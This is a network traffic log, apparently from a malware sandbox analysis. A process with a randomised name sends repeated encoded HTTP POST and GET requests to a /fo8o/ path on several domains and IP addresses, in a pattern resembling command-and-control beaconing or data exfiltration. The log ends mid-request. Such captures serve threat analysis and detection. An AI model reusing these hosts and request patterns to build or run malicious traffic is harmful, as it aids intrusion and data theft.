45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4e 57 2b 6c 36 56 44 69 55 6a 66 53 54 6e 4d 45 48 39 5a 54 68 7a 67 4d 46 49 64 59 4a 36 43 4f 55 34 77 31 69 59 36 39 45 41 43 78 71 63 36 6e 51 3d 3d Data Ascii: 6d6p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfONW+l6VDiUjfSTnMEH9ZThzgMFIdYJ6COU4w1iY69EACxqc6nQ==
Jan 13, 2025 09:27:06.716149092 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 13 Jan 2025 08:27:06 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49977	116.50.37.244	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:27:08.363504887 CET	832	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 62 49 48 73 72 50 76 6e 33 4d 56 38 6f 34 41 73 62 69 7a 6c 6f 38 34 39 2b 78 73 46 6b 6f 44 62 72 67 5a 65 67 46 4e 68 45 66 53 37 4c 79 4f 63 3d Data Ascii: 6d6p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLbIHsrPvn3MV8o4Asbizlo849+xsFkoDbrgZegFNhEfS7LyOc=
Jan 13, 2025 09:27:09.260838985 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 13 Jan 2025 08:27:08 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49978	116.50.37.244	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:27:10.896178007 CET	1845	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 57 68 6e 6e 4d 6d 38 7a 49 2f 76 74 57 32 35 53 38 33 55 42 75 7a 46 41 38 70 49 79 36 62 70 35 32 51 37 47 6e 34 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 52 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a [TRUNCATED] Data Ascii: 6d6p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZWhnnMm8zI/vtW25S83UBuzFA8pIy6bp52Q7Gn4SYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxkRfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB1wpNShMPckys2DneIINpTzAmuPaAzpQX1rpe4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rPVUgpLUAY6ZLP8nEfomTXdULQucQIpCpTC0WvC7SSq/oVM1fhXkv52DijvfxSgCZ1pVQZit/ZjUZItB6AdVDtnWpE1AbNfINURZBS40B4oeBAMaRlNg7bJPtvdduHNwDQKC1kB0AP1fQ4Kok94p8fk4usG2txjuvY7FsNioUx+I6414ihiPVy/GHwMqAMhRSMFLsXJAdK1PBR9P1j/pPg+3YHCaYoZcs34vBXQups+ZYtHdLtuzknQrahXZpjVHFwxGG1PCOBOyIxU72X7Rqxf04UDhsstqvKvtIC54GJLFIKSMDiOOIw1kdQlmsZEtpMkWERAqfIJ+gHgdyqwCH6iL+RB8UPCRBDXPc/CgGFc/5hxCZsRB8ThoQh6BDFYgZGAb5PkvgD+JXGl1CaNQMmvi6AIpMIChwYGzlxkVKCqvpdNy+Ct6Ycto2bEu8p/xOcsUsIK3YP/cQJ2L30ElRRqrK9WxrOip+p+u+9HNxlkcFUxthIQcASTK4dPhoG5Q04R/sBTORYyU7xMjy [TRUNCATED]
Jan 13, 2025 09:27:11.781835079 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 13 Jan 2025 08:27:11 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49979	116.50.37.244	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:27:13.427493095 CET	535	OUT	GET /fo8o/?DZb=zf440xcx6XAL&6d6p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 13, 2025 09:27:14.474200964 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 13 Jan 2025 08:27:13 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49980	85.159.66.93	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:27:27.719454050 CET	791	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 30 6d 33 64 62 4e 68 44 68 71 70 56 78 73 47 51 38 63 69 77 6f 62 4d 66 47 44 45 54 54 58 74 30 46 77 50 70 7a 73 54 7a 43 62 78 76 45 65 4b 35 51 3d 3d Data Ascii: 6d6p=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R00m3dbNhDhqpVxsGQ8ciwobMfGDETTXt0FwPpzsTzCbxvEeK5Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49981	85.159.66.93	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:27:30.255682945 CET	811	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 33 62 45 6e 79 45 31 4b 59 32 45 30 58 6b 52 59 79 73 31 2b 62 69 57 2f 4f 76 74 67 45 50 65 44 52 55 6b 38 34 47 57 58 39 73 73 52 56 39 42 38 3d Data Ascii: 6d6p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5j3bEnyE1KY2E0XkRYys1+biW/OvtgEPeDRUk84GWX9ssRV9B8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49982	85.159.66.93	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:27:32.790982008 CET	1824	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 37 43 70 66 30 37 2b 4f 47 4b 4c 33 48 63 79 76 79 77 6c 69 48 2b 48 36 46 44 46 69 49 4a 63 5a 63 72 2b 62 55 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 38 46 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 [TRUNCATED] Data Ascii: 6d6p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/7Cpf07+OGKL3HcyvywliH+H6FDFiIJcZcr+bUYwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs8FQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBuORqZvOIduHT5ua2VunEsxTtqW9Hzv4C73V5BciD6jh4S6IfuEsb550muWnceqjpZzyLMUiRSsgOqUShzbiCgh40GXUleyGCM3NgW+tQURwV1dO24G4rea3U6Ffj25A4NzEagsprA5VScT8CV3E+ajBmMKNn80Ie03krdGC1X/nBbKUHKYr+KAnfyh+CR9Q3yAplJju8TYG78Dk1c16QLYhPsb/FU2St/h9fxfU8wPbOa2Wd/4tUJQsmHjWF/9/SbVETy20vWWjGfqfJG4J2c5jncKPudkZqcEALwkcJ/x0iC5BdIIu85fmIv/alIXtEAG0EQDOuoF+Cr9rbjdU6mR+ov8VmxL82qZwn62SRcE/hIpvwX7ImpP/fDcuyEcxrL1Iw1rcb43EmeSsYFqKORO/2kjbpZkKEBckzZwe8IbxlpA2BxBY4pu/GROUuK/s8oRkATNcpWS2qbXcUJWZTJ/CsXoeST6yjX6JW050d05PCbfjUr7GDbP4uG6mYj1EzuB+ZGz7hDE/k7CxulLC5mh3GhuhCO6HEkghkU+d5adZ3cHDEgLBZMrF+XJSnYgN6sWtoWVvvWO53alS/2hE8FQc [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49983	85.159.66.93	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:27:35.332473993 CET	528	OUT	GET /fo8o/?DZb=zf440xcx6XAL&6d6p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNRwjYf1m964qUSTP7WQyE0w3buAATyqoGj3VWMs6RJMKNOUgjB5nLBKL HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 13, 2025 09:28:36.016645908 CET	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49984	91.195.240.94	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:28:41.096118927 CET	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 